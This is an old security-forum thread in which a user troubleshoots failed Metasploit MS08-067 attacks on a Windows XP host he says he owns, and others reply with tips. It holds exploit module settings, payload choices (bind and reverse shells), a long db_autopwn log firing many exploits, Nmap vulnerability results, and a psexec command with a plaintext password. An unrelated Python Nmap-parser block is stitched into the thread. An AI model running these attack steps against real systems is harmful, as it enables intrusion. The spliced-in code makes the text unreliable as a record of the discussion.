Question when exploit target via metasploit ms08-06_netapi

raymond hua

Newbie

Posts: 3

Joined: Thu Dec 17, 2009 11:05 pm

Post Thu Dec 17, 2009 11:56 pm

Question when exploit target via metasploit ms08-06_netapi

My test target is 9.181.147.90. When I had set the settings and began to exploit, the following error information appeared: Exploit failed: Connection reset by peer.
After the first attempt, I tried to exploit it again. Then the error information was: Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
At the same time, port 445 was closed.


msf exploit(ms08_067_netapi) > set payload generic/shell/bind_tcp
[-] The value specified for payload is not valid.
msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms08_067_netapi) > set

Global
======

No entries in data store.

Module: windows/smb/ms08_067_netapi
===================================

  Name                            Value
  ----                            -----
  ConnectTimeout                  10
  DCERPC::ReadTimeout              0
  DCERPC::fake_bind_multi          true
  DCERPC::fake_bind_multi_append  0
  DCERPC::fake_bind_multi_prepend  0
  DCERPC::max_frag_size            4096
  DCERPC::smb_pipeio              rw
  DisablePayloadHandler            false
  EXITFUNC                        thread
  EnableContextEncoding            false
  RPORT                            445
  SMB::obscure_trans_pipe_level    0
  SMB::pad_data_level              0
  SMB::pad_file_level              0
  SMB::pipe_evasion                false
  SMB::pipe_read_max_size          1024
  SMB::pipe_read_min_size          1
  SMB::pipe_write_max_size        1024
  SMB::pipe_write_min_size        1
  SMBDirect                        true
  SMBDomain                        WORKGROUP
  SMBName                          *SMBSERVER
  SMBPIPE                          BROWSER
  SMBPass                         
  SMBUser                         
  SSL                              false
  SSLVersion                      SSL3
  TCP::max_send_size              0
  TCP::send_delay                  0
  WfsDelay                        0
  lhost                            9.181.73.46
  payload                          generic/shell_bind_tcp
  rhost                            9.181.147.90
  target                          0

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional
[*] Selected Target: Windows XP SP2 Chinese - Traditional (NX)
[*] Triggering the vulnerability...
[-] Exploit failed: Connection reset by peer
[*] Exploit completed, but no session was created.

Then I tried another way: letting Metasploit execute the exploits automatically via the command db_autopwn -p -t -e. The results are below; the exploitation stopped at "Started bind handler" for a long time, and at last the attempt failed.

msf > db_autopwn -p -t -e
[*] Analysis completed in 8.35199999809265 seconds (0 vulns / 0 refs)
[*] Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] Matched exploit/linux/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] Matched exploit/multi/samba/nttrans against 9.181.147.90:139...
[*] (3/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:445...
[*] Matched exploit/multi/samba/nttrans against 9.181.147.90:139...
[*] (4/104): Launching exploit/multi/samba/nttrans against 9.181.147.90:139...
[*] Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
[*] (5/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
[*] Matched exploit/netware/smb/lsass_cifs against 9.181.147.90:445...
[*] (6/104): Launching exploit/netware/smb/lsass_cifs against 9.181.147.90:139...
[*] Matched exploit/osx/email/mailapp_image_exec against 9.181.147.90:25...
[*] Matched exploit/osx/email/mobilemail_libtiff against 9.181.147.90:25...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] (9/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] Matched exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] (10/104): Launching exploit/osx/samba/lsa_transnames_heap against 9.181.147.90:139...
[*] Matched exploit/osx/samba/trans2open against 9.181.147.90:139...
[*] Matched exploit/osx/samba/trans2open against 9.181.147.90:139...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] Matched exploit/solaris/samba/lsa_transnames_heap against 9.181.147.90:445...
[*] Matched exploit/solaris/samba/trans2open against 9.181.147.90:139...
[*] (15/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:445...
[*] Matched exploit/solaris/samba/trans2open against 9.181.147.90:139...
[*] (16/104): Launching exploit/solaris/samba/trans2open against 9.181.147.90:139...
[*] Matched exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25...
[*] (17/104): Launching exploit/unix/smtp/clamav_milter_blackhole against 9.181.147.90:25...
[*] Matched exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25...
[*] (18/104): Launching exploit/unix/webapp/squirrelmail_pgp_plugin against 9.181.147.90:25...

[-] Exploit failed: The following options failed to validate: MAILTO.
[*] Matched exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967...
[*] (19/104): Launching exploit/windows/antivirus/symantec_rtvscan against 9.181.147.90:2967...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
[*] (20/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
[*] Matched exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:445...
[*] (21/104): Launching exploit/windows/brightstor/etrust_itm_alert against 9.181.147.90:139...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135...
[*] (22/104): Launching exploit/windows/dcerpc/ms03_026_dcom against 9.181.147.90:135...
[*] Started bind handler
[*] Connecting to SMTP server 9.181.147.90:25...
[*] Started bind handler
[*] Started bind handler
[*] Matched exploit/windows/email/ani_loadimage_chunksize against 9.181.147.90:25...
[*] Job limit reached, waiting on modules to finish...
[*] Connected to target SMTP server.
[*] Banner: 220 9.181.147.90 Simple Mail Transfer Service Ready
[*] Started bind handler
[-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:9.181.147.90[135] ...
[*] Sending exploit ...
[-] Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
[*] Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
[*] (24/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] Matched exploit/windows/smb/ms03_049_netapi against 9.181.147.90:445...
[*] (25/104): Launching exploit/windows/smb/ms03_049_netapi against 9.181.147.90:139...
[*] Started bind handler
[*] Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms04_007_killbill against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
[*] (28/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 9.181.147.90:445...
[*] (29/104): Launching exploit/windows/smb/ms04_011_lsass against 9.181.147.90:139...
[*] Started bind handler
[-] Exploit failed: Login Failed: The server responded with unimplemented command 0 with WordCount 0
[*] Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] (30/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms04_031_netdde against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[*] Started bind handler
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] (31/104): Launching exploit/windows/smb/ms04_031_netdde against 9.181.147.90:139...
[*] Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:2967).
[*] (32/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms05_039_pnp against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Connecting to the SMB service...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] (33/104): Launching exploit/windows/smb/ms05_039_pnp against 9.181.147.90:139...
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Connecting to the SMB service...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] Matched exploit/windows/smb/ms06_025_rasmans_reg against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms06_025_rras against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
[*] (38/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms06_040_netapi against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] (39/104): Launching exploit/windows/smb/ms06_040_netapi against 9.181.147.90:139...
[*] Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[-] Exploit failed: The connection timed out (9.181.147.90:445).
[*] (40/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
[-] Exploit failed: can't convert nil into Integer
[*] Matched exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:445...
[*] (41/104): Launching exploit/windows/smb/ms06_066_nwapi against 9.181.147.90:139...
[-] Exploit failed: can't convert nil into Integer
[*] Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
[*] (42/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Connecting to the SMB service...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] (43/104): Launching exploit/windows/smb/ms06_066_nwwks against 9.181.147.90:139...
[*] Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Connecting to the SMB service...
[*] Started bind handler
[-] Exploit failed: The connection timed out (9.181.147.90:139).
[*] (44/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
[*] Matched exploit/windows/smb/ms08_067_netapi against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler
[-] Exploit failed: The connection was refused by the remote host (9.181.147.90:445).
[*] (45/104): Launching exploit/windows/smb/ms08_067_netapi against 9.181.147.90:139...
[*] Matched exploit/windows/smb/msdns_zonename against 9.181.147.90:445...
[*] Job limit reached, waiting on modules to finish...
[*] Started bind handler

I would appreciate it if someone can help me, thanks!
3PIL0GU3

Newbie

Posts: 38

Joined: Tue Aug 18, 2009 7:48 am

Post Fri Dec 18, 2009 2:37 am

Re: Question when exploit target via metasploit ms08-06_netapi

Did you try using a Reverse TCP payload instead of a bind shell payload? You may have better luck.
----------------------------
CEH
Ketchup

Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sat Dec 19, 2009 1:24 am

Re: Question when exploit target via metasploit ms08-06_netapi

I sincerely hope you have permission to exploit that host. There could be an IPS or AntiVirus product stopping your exploit.
~~~~~~~~~~~~~~
Ketchup
raymond hua

Newbie

Posts: 3

Joined: Thu Dec 17, 2009 11:05 pm

Post Sun Dec 20, 2009 8:46 pm

Re: Question when exploit target via metasploit ms08-06_netapi

To: 3PIL0GU3

Following your suggestion, I tried again via windows/shell/reverse_tcp and windows/shell/reverse_tcp_allports. Unfortunately, it also failed.


Global
======

No entries in data store.

Module: windows/smb/ms08_067_netapi
===================================

  Name                            Value
  ----                            -----
  ConnectTimeout                  10
  DCERPC::ReadTimeout              0
  DCERPC::fake_bind_multi          True
  DCERPC::fake_bind_multi_append  0
  DCERPC::fake_bind_multi_prepend  0
  DCERPC::max_frag_size            4096
  DCERPC::smb_pipeio              rw
  DisablePayloadHandler            false
  EXITFUNC                        thread
  EnableContextEncoding            false
  RPORT                            445
  SMB::obscure_trans_pipe_level    0
  SMB::pad_data_level              0
  SMB::pad_file_level              0
  SMB::pipe_evasion                False
  SMB::pipe_read_max_size          1024
  SMB::pipe_read_min_size          1
  SMB::pipe_write_max_size        1024
  SMB::pipe_write_min_size        1
  SMBDirect                        True
  SMBDomain                        WORKGROUP
  SMBName                          *SMBSERVER
  SMBPIPE                          BROWSER
  SMBPass                         
  SMBUser                         
  SSL                              false
  SSLVersion                      SSL3
  TCP::max_send_size              0
  TCP::send_delay                  0
  WfsDelay                        0
  lhost                            9.181.73.46
  payload                          windows/shell/reverse_tcp
  rhost                            9.181.147.90
  target                          0

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Chinese - Traditional
[*] Selected Target: Windows XP SP2 Chinese - Traditional (NX)
[*] Triggering the vulnerability...
[-] Exploit failed: Connection reset by peer
[*] Exploit completed, but no session was created.

After the attempt, I used another bash to check port 445; it was closed. Before the attempt, port 445 was open. Maybe I should show my scan results from Nmap for your reference.

Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2009-12-21 09:43 中国标准时间
NSE: Script Scanning completed.
Nmap scan report for 27119hua.cn.ibm.com (9.181.147.90)
Host is up (0.00s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE
25/tcp  open  smtp
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv

Host script results:
|  smb-check-vulns: 
|    MS08-067: VULNERABLE
|    Conficker: Likely CLEAN
|    regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_  SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
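As an added example (not from the thread and not Nmap's own code), here is a small parser for an Nmap normal-output report like the one posted above. It extracts the port table and the smb-check-vulns verdicts so a remediation owner can see which checks came back VULNERABLE and which were skipped; the embedded report is a constructed sample with placeholder host names.

```python
import re

# Constructed sample in Nmap "normal" output, modelled on the report in the
# thread; the host name and address below are placeholders, not real hosts.
SAMPLE_REPORT = """\
Nmap scan report for host.example.test (192.0.2.10)
PORT     STATE SERVICE
25/tcp   open  smtp
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv

Host script results:
|  smb-check-vulns:
|    MS08-067: VULNERABLE
|    Conficker: Likely CLEAN
|    regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_  SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
"""

def parse_report(text):
    """Parse one host's report into host, port table and NSE host-script results."""
    report = {"host": None, "ports": [], "scripts": {}}
    script = None
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            report["host"] = line[len("Nmap scan report for "):]
        elif m := re.match(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)", line):
            port, proto, state, service = m.groups()
            report["ports"].append((int(port), proto, state, service))
        elif m := re.match(r"^\|[_ ]\s+([^:]+):\s*$", line):   # "|  script-name:"
            script = m.group(1)
            report["scripts"][script] = {}
        elif script and (m := re.match(r"^\|[_ ]\s+(.+?):\s+(.+)$", line)):
            report["scripts"][script][m.group(1)] = m.group(2)   # "|    check: verdict"
    return report

def triage(report):
    """Summarise SMB exposure plus every smb-check-vulns check that reported
    VULNERABLE or was skipped, so 'not flagged' is not mistaken for 'clean'."""
    checks = report["scripts"].get("smb-check-vulns", {})
    return {
        "host": report["host"],
        "smb_exposed": any(p in (139, 445) and s == "open"
                           for p, _, s, _ in report["ports"]),
        "vulnerable": sorted(k for k, v in checks.items() if v.startswith("VULNERABLE")),
        "skipped": sorted(k for k, v in checks.items() if v.startswith("CHECK DISABLED")),
    }
```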
raymond hua

Newbie

Posts: 3

Joined: Thu Dec 17, 2009 11:05 pm

Post Sun Dec 20, 2009 9:22 pm

Re: Question when exploit target via metasploit ms08-06_netapi

To Ketchup

9.181.147.90 is owned by myself, and all the tests have been approved by my manager.
I have uninstalled our firewall, and I think there is no IPS in our internal network. But I do not know whether there is a limitation. For this case, I can exploit 9.181.147.90 via psexec and have administrator authority.


C:\>psexec \\9.181.147.90 -u hua -p basketball -e cmd.exe

PsExec v1.91 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Sincerely hoping for your reply!
LSOChris

Post Thu Dec 24, 2009 12:49 pm

Re: Question when exploit target via metasploit ms08-06_netapi

My guess is that the return is bad or something like DEP is preventing code execution. Try manually setting the target.
